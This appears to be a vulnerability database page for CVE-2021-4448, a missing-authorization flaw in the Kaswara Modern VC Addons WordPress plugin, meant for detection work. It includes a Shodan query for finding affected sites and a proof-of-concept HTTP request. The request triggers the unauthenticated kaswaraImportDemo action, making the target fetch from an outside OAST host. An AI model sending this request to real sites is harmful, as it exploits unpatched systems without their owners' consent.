🔙 목록으로 돌아가기

CVE-2021-4448: Kaswara Modern VC Addons <= 3.0.1 - Missing Authorization

TitleKaswara Modern VC Addons <= 3.0.1 - Missing Authorization
Authordaffainfo
SeverityHigh
ImpactUnauthenticated attackers can perform unauthorized actions including file uploads, deletions, and data import, potentially leading to site compromise.
RemediationDeactivate and delete the plugin from the server
CVSS Score7.3
EPSS Score0.43626
CVE IDCVE-2021-4448
CWE IDCWE-862
Shodan Queryhtml:"kaswara"
Tags cve cve2021 wp wordpress wp-plugin kaswara oast vkev

🔍 Vulnerability Description

The Kaswara Modern VC Addons plugin for WordPress is vulnerable to authorization bypass in versions up to, and including, 3.0.1 due to insufficient capability checking on various AJAX actions. This makes it possible for unauthenticated attackers to perform a wide variety of unauthorized actions such as importing data, uploading arbitrary files, deleting arbitrary files, and more.

🌐 HTTP Request

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15
Connection: close
Content-Length: 89
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

action=kaswaraImportDemo&contentUrl=http://d5joa11le0o4ac1i9me0jbosrdc14xk5d.oast.online/

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-4448.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-4448.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A